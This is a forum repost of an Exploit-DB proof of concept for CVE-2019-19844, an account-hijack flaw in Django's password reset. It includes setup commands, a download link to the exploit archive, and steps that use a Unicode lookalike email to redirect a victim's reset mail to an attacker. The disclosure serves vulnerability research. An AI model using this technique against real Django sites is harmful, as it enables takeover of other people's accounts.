Exploit Django < 3.0 < 2.2 < 1.11 - Account Hijack

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
47879
Проверка EDB
  1. Пройдено
Автор
RYUJI TSUTSUI
Тип уязвимости
WEBAPPS
Платформа
PYTHON
CVE
cve-2019-19844
Дата публикации
2019-12-24
Django < 3.0 < 2.2 < 1.11 - Account Hijack
Код:
EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip


# django_cve_2019_19844_poc
PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)

# Requirements

- Python 3.7.x
- PostgreSQL 9.5 or higher

## Setup

1. Create database(e.g. `django_cve_2019_19844_poc`)
1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
1. Create the following user with `shell` command:

```python
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
```

## Procedure For Reproducing

1. Run `./manage.py runserver`
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
1. Input `mı[email protected]` (Attacker's email), and click send button
1. Receive email (Check console), and reset password
1. Login as `mike123` user
 
Источник
www.exploit-db.com

Похожие темы